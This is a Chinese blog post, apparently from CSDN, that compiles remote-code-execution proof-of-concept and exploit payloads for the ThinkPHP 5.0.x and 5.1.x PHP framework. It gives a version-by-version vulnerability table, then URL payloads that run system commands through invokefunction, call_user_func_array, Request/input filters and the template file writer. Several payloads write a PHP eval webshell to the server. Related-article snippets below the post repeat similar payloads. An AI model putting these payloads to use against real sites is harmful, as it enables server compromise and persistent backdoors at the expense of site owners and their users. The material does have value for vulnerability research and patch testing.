thinkphp5.0和5.1 rce poc总结

最新推荐文章于 2024-05-17 15:27:50 发布
最新推荐文章于 2024-05-17 15:27:50 发布
阅读量1.2w 收藏 27
点赞数 8
分类专栏: php审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40709439/article/details/86564457
版权

照搬Sp4ce大神的: https://bbs.ichunqiu.com/thread-49591-1-1.html

版本名 	是否可被攻击 	攻击条件
5.0.0 	否 	        无
5.0.1 	否 	        无
5.0.2 	否 	        无
5.0.3 	否 	        无
5.0.4 	否 	        无
5.0.5 	否 	        无
5.0.6 	否 	        无
5.0.7 	否 	        无
5.0.8 	是 	        无需开启debug
5.0.9 	是 	        无需开启debug
5.0.10 	是 	        无需开启debug
5.0.11 	是 	        无需开启debug
5.0.12 	是 	        无需开启debug
5.0.13 	是 	        需开启debug
5.0.14 	是 	        需开启debug
5.0.15 	是 	        需开启debug
5.0.16 	是 	        需开启debug
5.0.17 	是 	        需开启debug
5.0.18 	是 	        需开启debug
5.0.19 	是 	        需开启debug
5.0.20 	否 	        无
5.0.21 	是 	        需开启debug
5.0.22 	是 	        需开启debug
5.0.23 	是 	        需开启debug

两个通杀payload

版本号:5.0.8~5.0.19
payload:s=whoami&_method=__construct&filter&filter=system

版本号:5.0.20~5.0.23
payload:_method=__construct&filter[]=system&method=get&server[REQUSET_METHOD]=whoami

不过我测试的不成功

下面是网上找的payload

5.1.x php版本>5.5:

http://127.0.0.1/index.php?s=index/think\request/input?data[]=phpinfo()&filter=assert

http://127.0.0.1/index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

http://127.0.0.1/index.php?s=index/\think\template\driver\file/write?cacheFile=shell.php&content=<?php%20phpinfo();?>

5.0.x php版本>=5.4:

exp0 = '/index.php/?s=index/\\think\\template\driver\\file/write&cacheFile=zxc0.php&content=<?php @eval($_POST[xxxxxx]);?>'
exp1 = '/index.php/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=zxc1.php&vars[1][]=<?php @eval($_POST[xxxxxx]);?>'
exp2 = '/index.php/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo \'<?php @eval($_POST[xxxxxx]);?>\'>zxc2.php'

pay

http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=phpinfo&data=1

http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=system&data=操作系统命令

http://url/to/thinkphp5.1.29/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E

http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=操作系统命令

http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

5.1.x php版本>5.5

http://127.0.0.1/index.php?s=index/think\request/input?data[]=phpinfo()&filter=assert

http://127.0.0.1/index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

http://127.0.0.1/index.php?s=index/\think\template\driver\file/write?cacheFile=shell.php&content=<?php%20phpinfo();?>

5.0.x php版本>=5.4

http://127.0.0.1/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()

总结5.0.x的payload,成功复现

使用版本:5.0.7~5.0.23

poc:

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()

exp:

执行命令:

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=操作系统命令 (如 dir whoami)

写shell:

?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo \'<?php @eval($_POST[xxxxxx]);?>\'>zxc2.php'

?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=zxc1.php&vars[1][]=<?php @eval($_POST[xxxxxx]);?>

当然还有file_get_contens fopen等php函数也可以写

总结5.1.x的payload,成功复现

poc:

http://127.0.0.1/index.php?s=index/\think\template\driver\file/write?cacheFile=shell.php&content=<?php%20phpinfo();?>

http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=phpinfo&data=1

http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

exp:

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=操作系统命令

?s=index/\think\Request/input&filter=system&data=操作系统命令

?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
莫者
关注
  • 8
    点赞
  • 27
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
thinkphp5.0.X 全版本变量覆盖导致的RCE分析
小石的博客
11-12 2396
thinkphp5.0.0分析起 POST /thinkphp5.0.0 HTTP/1.1 Host: www.example.com a=whoami&_method=__construct&filter=system&method=GET 5.0.0版本为什么是这样的Payload? 第一次调用Request下的method方法,看到是检查路由的时候。 _met...
13-PHP代码审计——ThinkPHP5.0.15聚合查询漏洞分析
网络安全
05-06 576
漏洞环境: ThinkPHP5.0.15 <= 漏洞影响版本 poc: id),(select sleep(5)),(username id),(updatexml(1,concat(0x7,database(),0x7e),1) 什么是聚合查询? mysql数据库中有一张users表用于存储用户信息,假如我们想要查询users表中有多少个用户的记录,可以直接执行select * from users sql语句来获取用户的个数记录,但是这样做的效率非常低,因为我们只想..
Thinkphp v5.x 远程代码执行漏洞复现及POC集合
qq_67473072的博客
07-13 4265
Thinkphp v5.x 远程代码执行漏洞复现及POC集合
thinkphp5-rce
最新发布
shierbai的博客
05-17 415
method=_construct&filter[]=system&method=get&server[REQUEST_METHOD]=id(系统命令)此之前的版本中,获取method的方法没有正确处理方法名,攻击者可以调用request类任意方法并构造利用链,从而导致远程代码执行漏洞。其版本5中,没有正确处理控制器名,导致网站在没有开启强制路由的情况下(默认情况)可以执行任意方法,从而导致远程命令执行漏洞。应用:很多cms是基于thinkphp5二次开发的,所以出问题的话,会影响很多基于其开发的网站。
【01】ThinkPHP 5.0.1 完整版项目部署
Chandlerr的博客
03-23 500
ThinkPHP 5.0.1 完整版项目部署,工具使用的是PhpStudy
PHP网站漏洞poc,ThinkPHP-5.0.23新的RCE漏洞测试和POC
weixin_29876887的博客
04-02 716
TP5新RCE漏洞昨天又是周五,讨厌周五曝漏洞,还得又得加班,算了,还是先验证一波。新的TP5RCE,据说发现者因为上次的RCE,于是又审计了代码,结果发现的。TP5也成了万人轮啊。测试环境搭建windows下phpstudy,然后下载tp5.0.23到相应的www目录下linux,安装启动apache和php,下载tp5.0.23到相应www目录下mac(本机) 启动apache, 下载tp5....
Thinkphp5 RCE漏洞
Sentiment的博客
05-21 6992
影响版本 5.0.0<=ThinkPHP5<=5.0.23 、5.1.0<=ThinkPHP<=5.1.30 不同版本payload不同,且5.13版本后还与debug模式有关 这里跟着feng师傅复现的,所以用的也是5.0.22 ThinkPHP5.0.22完整版 - ThinkPHP框架 5.0.22debug模式RCE 这波属实下饭了,开启debug模式后payload一直没打通,后来发现改成其他版本的配置文件了.........
ThinkPHP5.05.1完全开发手册合集
11-28
ThinkPHP5.05.1完全开发手册合集》是针对PHP开发者的重要参考资料,主要涵盖了ThinkPHP5.05.1两个版本的框架使用、设计模式、最佳实践等多个方面。这两个版本的更新与改进,使得ThinkPHP在易用性、性能优化...
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
08-03
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
ThinkPHP5.05.1完全开发手册 、快速入门
01-03
在学习过程中,结合《ThinkPHP5.0完全开发手册》和《ThinkPHP5.1完全开发手册》中的实例和详细讲解,开发者可以逐步深入到框架的高级特性,如服务容器、事件系统、插件开发、分布式应用支持等。这些书籍是ThinkPHP5...
ThinkPHP 5.0 完全开发手册 chm格式
05-26
ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。遵循Apache2开源许可协议发布,意味着你可以免费使用ThinkPHP,甚至允许把你基于ThinkPHP开发的应用开源或商业...
ThinkPHP5.0完全开发手册.pdf
03-24
ThinkPHP5.0完全开发手册PDF版,骗子勿扰。2017年9月更新。
ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞
热门推荐
a1b2c3是弱口令
12-11 1万+
ThinkPHP是一款运用极广的PHP开发框架。其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。 复现环境 ThinkPHP 5.0.20版本 环境启动后,访问http://192.168.1.15:8080即可看到ThinkPHP默认启动页面。 漏洞复现 payload: /index.php?s=inde...
ThinkPHP 5.x RCE 漏洞分析与利用总结
dengzhasong7076的博客
01-21 4902
近日ThinkPHP出现由于变量覆盖而引起的RCE,其漏洞根本源于thinkphp/library/think/Request.php中method方法可以进行变量覆盖,通过覆盖类的核心属性filter导致rce,其攻击点较为多,有些还具有限制条件,另外由于种种部分原因,在利用上会出现一些问题。 例如: 1、大部分payload进入最后rce的函数是调用了call_user_func,其...
Thinkphp5.0.2Rce分析
lastwinn的博客
07-06 2223
记录自己的所学以及理解。
ThinkPHP 5.x远程命令执行漏洞复现
WY92139010的博客
09-23 680
ThinkPHP 5.x远程命令执行漏洞复现 一、漏洞描述 2018年12月10日,ThinkPHP官方发布了安全更新,其中修复了ThinkPHP5框架的一个高危漏洞: https://blog.thinkphp.cn/869075 漏洞的原因是由于框架对控制器名没有进行足够的检测,导致在没有开启强制路由(默认未开启)的情况下可能导致远程代码执行,受影响的版本包括5.05.1。 ...
[代码审计]ThinkPHP 5.0.x 变量覆盖导致的RCE分析
Huamang的博客
11-26 5457
前言 漏洞存在版本,分为两大版本: ThinkPHP 5.0-5.0.24 ThinkPHP 5.1.0-5.1.30 环境搭建 composer create-project topthink/think=5.0.5 thinkphp5.0.5 --prefer-dist 修改composer.json "require": { "php": ">=5.4.0", "topthink/framework": "5.0.5" }, 执行composer update
Thinkphp5未开启强制路由导致的RCE 漏洞复现与分析
xiaolong22333的博客
09-28 893
影响版本 小于5.0.23 小于5.1.30 5.0.x ?s=index/think\config/get&name=database.username # 获取配置信息 ?s=index/\think\Lang/load&file=../../test.jpg # 包含任意文件 ?s=index/\think\Config/load&file=../../t.php # 包含任意.php文件 ?s=index/\think\app/invokefunction&
ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 远程命令执行漏洞
Ambulong的博客
12-11 5485
ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.05.1版本,推荐尽快更新到最新版本。 在线环境地址:https://www.vulnspy.com/cn-thinkphp-5.x-rce/ 执行phpi...
thinkphp5.0thinkphp5.1不同之处
05-13
ThinkPHP 5.1相对于5.0来说,有以下的不同之处: 1. 底层框架升级:ThinkPHP 5.1采用了更高版本的底层框架,这意味着更好的性能和更加稳定的运行。 2. 新增了更多的驱动支持:ThinkPHP 5.1新增了更多的驱动支持,包括数据库的驱动和缓存的驱动等。 3. 新增了更多的核心类库:ThinkPHP 5.1新增了更多的核心类库,包括XML类库和验证类库等。 4. 新增了更多的功能:ThinkPHP 5.1新增了更多的功能,包括RESTful API支持和跨域访问支持等。 5. 更加灵活的路由配置:ThinkPHP 5.1的路由配置更加灵活,可以更加方便地扩展和定制化。 总的来说,ThinkPHP 5.1相对于5.0来说,拥有更加完善的功能和更加优秀的性能,同时也更加灵活,可以更好地满足开发者的需求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值